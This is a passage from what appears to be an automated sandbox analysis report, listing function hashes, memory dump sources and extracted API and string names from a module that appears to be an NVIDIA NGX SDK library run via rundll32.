                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 54df61bbafd376e8f1349e4aa377f4626598ae86d2b6d09b37910e7bb908dfc3
                                                                                                                                  • Instruction ID: e774bcdeb01abe9890ccc3d75d52ed139615c4862c7338a72fe28de909ae2d04
                                                                                                                                  • Opcode Fuzzy Hash: 54df61bbafd376e8f1349e4aa377f4626598ae86d2b6d09b37910e7bb908dfc3
                                                                                                                                  • Instruction Fuzzy Hash: 7D21C4167385B005FBB58739A071F366BE4DBA97C0F85B036A9EC86E99D91FD1008F50
                                                                                                                                  Function 00007FFD92DB55B0 Relevance: .1, Instructions: 66COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1b80b68e5dd364e73026a90a475cf71157328046318175a845d3ce06da6f58cb
                                                                                                                                  • Instruction ID: fb3628deb2c2f5f0741d155448c8ef844362abe61c8f7e863886313beb4aa02b
                                                                                                                                  • Opcode Fuzzy Hash: 1b80b68e5dd364e73026a90a475cf71157328046318175a845d3ce06da6f58cb
                                                                                                                                  • Instruction Fuzzy Hash: 5B21F7167385B404F7B5C729A071F36ABE4CBA57C0F85B032A9EC86E99D91FE1004F90
                                                                                                                                  Function 00007FFD92DBFAC0 Relevance: .1, Instructions: 66COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d22dcfe589e8c01c3f41f9e7089e02a84077e88ee6fb0419a19f3df6f0fa83db
                                                                                                                                  • Instruction ID: 50724cdb3445704d427e653b6e72545ac12aaafde2de72f033b94e012782ff9d
                                                                                                                                  • Opcode Fuzzy Hash: d22dcfe589e8c01c3f41f9e7089e02a84077e88ee6fb0419a19f3df6f0fa83db
                                                                                                                                  • Instruction Fuzzy Hash: DC21B2567385B005FBB58729A0B1F366AE4DBA9780F85B036A9EC86E95D91FD1008F40
                                                                                                                                  Function 00007FFD92DB1D70 Relevance: .1, Instructions: 66COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5798ec334a053781109db09298cdf5c74ce0122d0cdb0029b205978c3d608479
                                                                                                                                  • Instruction ID: c5af372f2572f441cd87641a62266f72ed17d3f758ba802c22e75fa097bcd5ad
                                                                                                                                  • Opcode Fuzzy Hash: 5798ec334a053781109db09298cdf5c74ce0122d0cdb0029b205978c3d608479
                                                                                                                                  • Instruction Fuzzy Hash: D021C4167385F005F7B58729A071F367AE4DBA97C0F85B036A9EC86E99E91FD1008F40
                                                                                                                                  Function 00007FFD92DB3050 Relevance: .1, Instructions: 66COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 85f2e8bf58d4f9b64b6909151b7aaee07ef0dbfdd006b4a9d11aa2e138a8a396
                                                                                                                                  • Instruction ID: a6e1bec0a861bb6ab4bdacdeb170e71cfb22c02ff462eabb4d03c18344fa35a6
                                                                                                                                  • Opcode Fuzzy Hash: 85f2e8bf58d4f9b64b6909151b7aaee07ef0dbfdd006b4a9d11aa2e138a8a396
                                                                                                                                  • Instruction Fuzzy Hash: 4521E5167385B404F7B5C72AA071F36ABE5C7A97C0F45B032A9AC86E95D81FD1004F90
                                                                                                                                  Function 00007FFD92DBD290 Relevance: 36.9, APIs: 6, Strings: 15, Instructions: 182libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$FileModuleName
                                                                                                                                  • String ID: API 0x%X Snippet 0x%X$C:\dvs\p4\build\sw\devrel\libdev\NGX\core\r1.2\source\api\nvsdk_ngx_common.cpp$Driver %d.%d Snippet expects at least %d.%d$GPU architecture 0x%X Snippet 0x%X$NGXValidateSnippet$NVSDK_NGX_GetAPIVersion$NVSDK_NGX_GetApplicationId$NVSDK_NGX_GetDriverVersion$NVSDK_NGX_GetGPUArchitecture$NVSDK_NGX_GetSnippetVersion$Snippet v%d.%d.%d Embedded app Id %07llX (%llu)$Validating snippet %s$error: failed to map functions in snippet %llX %llX %llX %llX %llX$error: snippet is using newer GPU arch %X > %X$error: snippet is using newer driver %d.%d > %d.%d
                                                                                                                                  • API String ID: 3859505661-3432153555
                                                                                                                                  • Opcode ID: ebab20289175742657cb254453a1aac9461496721fed0af0875b94e90ca3d93f
                                                                                                                                  • Instruction ID: c09c24c616d744925bda8b79ac87721bb14292ddc0496e038c224481e8b77a3c
                                                                                                                                  • Opcode Fuzzy Hash: ebab20289175742657cb254453a1aac9461496721fed0af0875b94e90ca3d93f
                                                                                                                                  • Instruction Fuzzy Hash: AD918172B08A8696E730CF90F8702AA73A8FB88B95F404136E94E63B54DF7CD505D700
                                                                                                                                  Function 00007FFD92DB5EC0 Relevance: 31.8, APIs: 7, Strings: 11, Instructions: 305libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc
                                                                                                                                  • String ID: : $/nvsdk_ngx.log$C:\dvs\p4\build\sw\devrel\libdev\NGX\core\r1.2\source\api\nvsdk_ngx_cuda_lib.cpp$CUDA Error At Line : $NVSDK_NGX_CUDA_CreateFeature$NVSDK_NGX_CUDA_EvaluateFeature$NVSDK_NGX_CUDA_GetParameters$NVSDK_NGX_CUDA_GetScratchBufferSize$NVSDK_NGX_CUDA_Init$NVSDK_NGX_CUDA_ReleaseFeature$NVSDK_NGX_CUDA_Shutdown
                                                                                                                                  • API String ID: 190572456-1838268342
                                                                                                                                  • Opcode ID: 80f8c14052652433341928b27793310e1be3c036478b4425c63c4efd2ad57d16
                                                                                                                                  • Instruction ID: 51d6dac6a82bc1e9bfa7fa9fa6339074b25ce01446ab851f8b42b9905e6e4f17
                                                                                                                                  • Opcode Fuzzy Hash: 80f8c14052652433341928b27793310e1be3c036478b4425c63c4efd2ad57d16
                                                                                                                                  • Instruction Fuzzy Hash: 98715B24B19A8281FA30DF95F8743B963A8BF88781F485135E98D57765EFBCE441E380
                                                                                                                                  Function 00007FFD92ECF440 Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 226librarymemoryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$Free$AddressAllocProc$ConditionInfoMaskVerifyVersion
                                                                                                                                  • String ID: D3DKMTEnumAdapters2$D3DKMTEnumAdapters3$D3DKMTQueryAdapterInfo$NVDA$\SystemRoot\system32\$gdi32.dll
                                                                                                                                  • API String ID: 698622721-2155789793
                                                                                                                                  • Opcode ID: d4a589c3a0a5bf55228324b5aad85beed0ea77cbd582812984007bf09c3c7f7e
                                                                                                                                  • Instruction ID: 8f8ee6c8c8c3522bee2c7a74a545387710063955807f7e671670ece23ef4450b
                                                                                                                                  • Opcode Fuzzy Hash: d4a589c3a0a5bf55228324b5aad85beed0ea77cbd582812984007bf09c3c7f7e
                                                                                                                                  • Instruction Fuzzy Hash: 74A14A26B19B4285FB60DFE5E8A02B933A9BF48789F414139CA0E93B54EF7DE414C354
                                                                                                                                  Function 00007FFD92DB9510 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 156COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastLocal$Free$AllocAttributesFile$ConditionInfoMaskVerifyVersion
                                                                                                                                  • String ID: \SystemRoot\system32\$system32\
                                                                                                                                  • API String ID: 3315302763-552109975
                                                                                                                                  • Opcode ID: 60289b2349a9eb0fe14bb5c2bf18d3853dafc44cbd9ad55d42797f911690d958
                                                                                                                                  • Instruction ID: e351e7e24f057f82e5fe78fb44a2ab3a0628333672653eff7acb51f74148b0f7
                                                                                                                                  • Opcode Fuzzy Hash: 60289b2349a9eb0fe14bb5c2bf18d3853dafc44cbd9ad55d42797f911690d958
                                                                                                                                  • Instruction Fuzzy Hash: 8B51E521F0D60345FA766BE2A4B01796395AF46BD2F080738ED4E07BD1EFAEE4408B10
                                                                                                                                  Function 00007FFD92DB22E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 155COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
